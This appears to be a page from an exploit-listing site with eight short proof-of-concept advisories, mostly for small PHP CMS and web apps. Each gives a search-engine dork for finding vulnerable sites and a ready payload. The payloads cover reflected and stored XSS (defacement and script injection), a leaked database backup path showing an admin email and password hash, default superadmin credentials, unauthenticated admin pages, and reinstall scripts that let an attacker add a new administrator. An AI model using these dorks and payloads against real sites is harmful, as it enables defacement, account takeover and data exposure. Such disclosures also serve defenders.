Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : HumbertoCaldas Cms v0.1.3 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://humbertocaldas.com | | # Dork : intext:''Site by Humberto Caldas" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : <marquee>Hacked by indoushka</marquee> [+] http://127.0.0.1/indoorpadelcenterpt/noticia.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Human Resource PMS v1.4 Database Disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://creativeitem.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] appears to leave backups in a world accessible directory under the document root. [+] Use Payload : uploads/login_restore_db.sql [+] http://127.0.0.1/creativeitemcom/demo/hrm/uploads/login_restore_db.sql [+] Line 852 : (1,NULL,'Admin',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'admin@example.com','7110eda4d09e062aa5e4a390b0a572ac0d2c0220',NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,NULL), Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : hudaallah Linker CMS v1.0 Xss Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.helpernt.com/vb/showthread.php?t=10749 | | # Dork : تصميم وبرمجة موقع هدى الله | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Affected items : /11/index.php /11/Install/install.php /11/sendmessage.php [+] Attack details : URI was set to "onmouseover='prompt(977091)'bad="> The input is reflected inside a tag parameter between double quotes. URI was set to "onmouseover='prompt(921483)'bad="> The input is reflected inside a tag parameter between double quotes. [+] /11/sendmessage.php/%22onmouseover%3d'prompt(921483)'bad%3d%22> [+] /11/index.php/%22onmouseover%3d'prompt(977091)'bad%3d%22> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Foodiee - Online Food Ordering Web Application V1.0.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://codecanyon.net/item/foodiee-restaurant-web-application/23335754?s_rank=57 | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Register a new account. [+] Publication does not await approval from the site administrator [+] Panel : http://127.0.0.1/themeforestkamleshyadavnet/script/foodiee/admin/update_testimonial/1 [+] Use Payload : <script>alert(/indoushka/);</script> put it in any input & save Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : HRM SAAS v 2.1.9 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://codecanyon.net/item/hrm-saas-human-resource-management/23400912?s_rank=48 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] appears to leave a default administrative account in place post installation. [+] Use Payload : Email : superadmin@example.com Password : 123456 [+] https://127.0.0.1/bbscomunicacionescom/rrhh/public/super-admin/dashboard Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : PHPValley Micro Jobs v2.0.1 Missing Authentication Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.p30vel.ir | | # Dork : Copyright (C) 2012 Ozgur Zeren (unity100@gmail.com) | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /admin/header.php & admin/invadmin.php [+] http://127.0.0.1/phpvall/admin/header.php [+] http://127.0.0.1/phpvall/admin/invadmin.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Hloun V1.0.0 Rinstall Script Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.facebook.com/LyonHost/ | | # Dork : Powered by Hloun © Version 1.0.0 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The install file allows you to re-install the script. [+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer. It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file. [+] Use PAyload : /install.php?step=install [+] http://127.0.0.1/sharerhadith/install.php?step=install [+] Panel : http://127.0.0.1/sharerhadith/admincp/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Hasan MWB v1 Reinstall Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | | # Vendor : http://hasanmwb.sourceforge.net/ | | # Dork : n/a | ==================================================================================================================================== poc : [+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer. It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file. [+] Dorking İn Google Or Other Search Enggine. [+] User Payload : /install.php [+] Enter new login information . [+] admin panel ====> http://127.0.0.1/hasanmwbsourceforgenet/panel/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>